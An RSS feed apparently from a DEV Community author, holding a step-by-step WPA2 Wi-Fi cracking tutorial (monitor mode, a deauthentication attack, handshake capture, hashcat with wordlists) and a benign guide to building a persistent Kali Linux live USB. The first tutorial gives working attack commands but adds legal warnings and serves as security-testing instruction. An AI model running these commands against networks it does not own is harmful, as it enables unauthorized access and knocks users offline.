<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Tim</title>
    <description>The latest articles on DEV Community by Tim (@tim_00).</description>
    <link>https://dev.to/tim_00</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3816021%2F0dd95165-042c-4f8b-b88d-2c7f8520e226.gif</url>
      <title>DEV Community: Tim</title>
      <link>https://dev.to/tim_00</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/tim_00"/>
    <language>en</language>
    <item>
      <title>Wi-Fi Hacking: From Handshake Capture to Password Cracking (WPA2)</title>
      <dc:creator>Tim</dc:creator>
      <pubDate>Tue, 10 Mar 2026 06:32:38 +0000</pubDate>
      <link>https://dev.to/tim_00/wi-fi-hacking-from-handshake-capture-to-password-cracking-wpa2-7ke</link>
      <guid>https://dev.to/tim_00/wi-fi-hacking-from-handshake-capture-to-password-cracking-wpa2-7ke</guid>
      <description>&lt;p&gt;This article describes step by step the process of hacking a Wi-Fi network using Kali Linux and tools such as aircrack-ng and hashcat.&lt;/p&gt;

&lt;p&gt;The main stages include enabling monitor mode, capturing a handshake using a deauthentication attack, converting the capture file using hashcat.net/cap2hashcat, and brute-forcing the password using wordlists.&lt;/p&gt;

&lt;p&gt;The method works mainly against weak passwords and should only be tested on networks you own.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Preparation&lt;/li&gt;
&lt;li&gt;Step 1: Monitoring the Air&lt;/li&gt;
&lt;li&gt;Step 2: Capturing the Handshake&lt;/li&gt;
&lt;li&gt;Step 3: Converting the Capture File&lt;/li&gt;
&lt;li&gt;Step 4: Brute Force with Hashcat&lt;/li&gt;
&lt;li&gt;Wordlists&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Preparation
&lt;/h2&gt;

&lt;p&gt;First update the repositories and obtain superuser privileges:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;su
apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Step 1: Monitoring the Air
&lt;/h2&gt;

&lt;p&gt;Switch the network adapter to &lt;strong&gt;monitor mode&lt;/strong&gt; so it can capture all packets within range.&lt;/p&gt;

&lt;p&gt;Check your wireless interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;iwconfig
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look for the name of your Wi-Fi adapter (usually &lt;code&gt;wlan0&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;Enable monitor mode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;airmon-ng start wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The interface name will usually change to &lt;strong&gt;wlan0mon&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Now scan for nearby networks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;airodump-ng wlan0mon
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look for the following information:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BSSID&lt;/strong&gt; — router MAC address
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CH&lt;/strong&gt; — channel
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Step 2: Capturing the Handshake
&lt;/h2&gt;

&lt;p&gt;To recover the password we must capture a &lt;strong&gt;WPA handshake&lt;/strong&gt;, which happens when a client connects to the router.&lt;/p&gt;

&lt;p&gt;Start packet capture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;airodump-ng &lt;span class="nt"&gt;--bssid&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;MAC&lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;CH&lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--write&lt;/span&gt; WPAcrack wlan0mon
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Speeding up the process (Deauth attack)
&lt;/h3&gt;

&lt;p&gt;To avoid waiting for a client to reconnect, we can force a temporary disconnection:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aireplay-ng &lt;span class="nt"&gt;--deauth&lt;/span&gt; 20 &lt;span class="nt"&gt;-a&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;MAC&lt;span class="o"&gt;}&lt;/span&gt; wlan0mon
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the message &lt;strong&gt;WPA Handshake&lt;/strong&gt; appears in the top corner of &lt;code&gt;airodump-ng&lt;/code&gt;, the capture is successful.&lt;/p&gt;




&lt;h2&gt;
  
  
  Step 3: Converting the Capture File
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;.cap&lt;/code&gt; file captured by &lt;code&gt;airodump-ng&lt;/code&gt; contains a lot of additional network traffic.&lt;/p&gt;

&lt;p&gt;Hashcat cannot use it directly, so it must be converted.&lt;/p&gt;

&lt;p&gt;Official converter:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://hashcat.net/cap2hashcat/" rel="noopener noreferrer"&gt;https://hashcat.net/cap2hashcat/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Upload the file &lt;code&gt;WPAcrack-01.cap&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;The service analyzes the capture&lt;/li&gt;
&lt;li&gt;It generates a file with extension &lt;code&gt;.hc22000&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This file contains the cleaned hash ready for password cracking.&lt;/p&gt;

&lt;p&gt;If the &lt;code&gt;.cap&lt;/code&gt; file contains several handshakes, the service may detect multiple networks.&lt;/p&gt;




&lt;h2&gt;
  
  
  Step 4: Brute Force (Hashcat)
&lt;/h2&gt;

&lt;p&gt;Now we move to the most resource-intensive step — password cracking using GPU acceleration.&lt;/p&gt;

&lt;p&gt;Use hash mode &lt;strong&gt;22000&lt;/strong&gt;, which is the modern WPA standard.&lt;/p&gt;

&lt;p&gt;Example command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashcat.exe &lt;span class="nt"&gt;-m&lt;/span&gt; 22000 WPAcrack.hc22000 &lt;span class="nt"&gt;-a0&lt;/span&gt; ../rockyou.txt ../3WiFi_cnt_WiFiKey.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To display the cracked password:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashcat.exe &lt;span class="nt"&gt;-m&lt;/span&gt; 22000 WPAcrack.hc22000 &lt;span class="nt"&gt;--show&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Wordlists
&lt;/h2&gt;

&lt;p&gt;Password recovery depends heavily on the quality of the wordlist.&lt;/p&gt;

&lt;p&gt;Common sources include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;rockyou.txt&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;custom generated dictionaries&lt;/li&gt;
&lt;li&gt;community wordlists&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://drive.google.com/drive/folders/1xrxFcx9ERhOZtm79bNfHwH0LoSOT2mYp" rel="noopener noreferrer"&gt;Wordlist Collection&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This method works mainly against simple passwords that exist in wordlists such as &lt;strong&gt;rockyou&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Strong passwords with random characters are significantly harder to crack.&lt;/p&gt;




&lt;p&gt;⚠️ &lt;strong&gt;Important&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Perform tests only on networks you own.&lt;/p&gt;

&lt;p&gt;Unauthorized access to other networks may violate the law.&lt;/p&gt;

</description>
      <category>bash</category>
      <category>kali</category>
      <category>tutorial</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Kali Linux Live USB with Persistence — Complete Guide</title>
      <dc:creator>Tim</dc:creator>
      <pubDate>Tue, 10 Mar 2026 06:09:02 +0000</pubDate>
      <link>https://dev.to/tim_00/kali-linux-live-usb-with-persistence-complete-guide-22bp</link>
      <guid>https://dev.to/tim_00/kali-linux-live-usb-with-persistence-complete-guide-22bp</guid>
      <description>&lt;p&gt;Kali Linux Live with persistence allows you to run the system directly from a USB drive while saving changes such as files, installed programs, and system settings.&lt;/p&gt;

&lt;p&gt;This method is useful if you want a portable penetration testing environment without installing Kali Linux on your computer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What You Need&lt;/li&gt;
&lt;li&gt;Creating the Bootable USB in Rufus&lt;/li&gt;
&lt;li&gt;Secure Boot&lt;/li&gt;
&lt;li&gt;Booting Kali Linux&lt;/li&gt;
&lt;li&gt;Testing Persistence&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  What You Need
&lt;/h2&gt;

&lt;p&gt;Before starting, prepare the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;USB flash drive &lt;strong&gt;16–32 GB (32 GB recommended)&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Official &lt;strong&gt;Kali Linux ISO&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rufus&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Creating the Bootable USB in Rufus
&lt;/h2&gt;

&lt;p&gt;Open &lt;strong&gt;Rufus&lt;/strong&gt; and configure the following settings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Boot selection&lt;/strong&gt; — Kali Linux ISO
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Partition scheme&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;GPT — for UEFI systems&lt;/li&gt;
&lt;li&gt;MBR — for compatibility&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;File system&lt;/strong&gt; — NTFS (default)&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Persistence partition size&lt;/strong&gt; — 8–20 GB&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Start&lt;/strong&gt; and select:&lt;/p&gt;

&lt;p&gt;ISO Image mode (Recommended)&lt;/p&gt;

&lt;p&gt;If Rufus asks about installing &lt;strong&gt;GRUB&lt;/strong&gt;, click &lt;strong&gt;Yes&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;![Rufus settings for creating a Kali Linux Live USB with persistence]&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F83bb0sqjn810prt9qxbk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F83bb0sqjn810prt9qxbk.png" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Secure Boot
&lt;/h2&gt;

&lt;p&gt;Secure Boot can usually remain enabled since Kali often runs without issues.&lt;/p&gt;

&lt;p&gt;However, for better compatibility with Wi-Fi adapters and drivers it is recommended to disable it.&lt;/p&gt;

&lt;p&gt;
  Example BIOS path to disable Secure Boot
  &lt;p&gt;BIOS → Security → Secure Boot → Disable&lt;/p&gt;



&lt;/p&gt;




&lt;h2&gt;
  
  
  Booting Kali Linux
&lt;/h2&gt;

&lt;p&gt;When booting from the USB drive, select:&lt;/p&gt;

&lt;p&gt;Live system with persistence&lt;/p&gt;

&lt;p&gt;This mode ensures that all system changes will be saved.&lt;/p&gt;




&lt;h2&gt;
  
  
  Testing Persistence
&lt;/h2&gt;

&lt;p&gt;To verify that persistence works:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a file on the desktop
&lt;/li&gt;
&lt;li&gt;Reboot the computer
&lt;/li&gt;
&lt;li&gt;Select &lt;strong&gt;Live system with persistence&lt;/strong&gt; again
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If the file remains after reboot — persistence works correctly.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Kali Linux Live with persistence is a portable cybersecurity laboratory that allows you to use Kali without installing it on your hard drive while keeping all system changes.&lt;/p&gt;




&lt;p&gt;If you found this guide helpful, consider following my profile for more cybersecurity tutorials.&lt;/p&gt;

&lt;p&gt;Future guides will include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Wi-Fi security testing&lt;/li&gt;
&lt;li&gt;Kali Linux tools&lt;/li&gt;
&lt;li&gt;Network scanning with Nmap&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>linux</category>
      <category>kali</category>
      <category>beginners</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
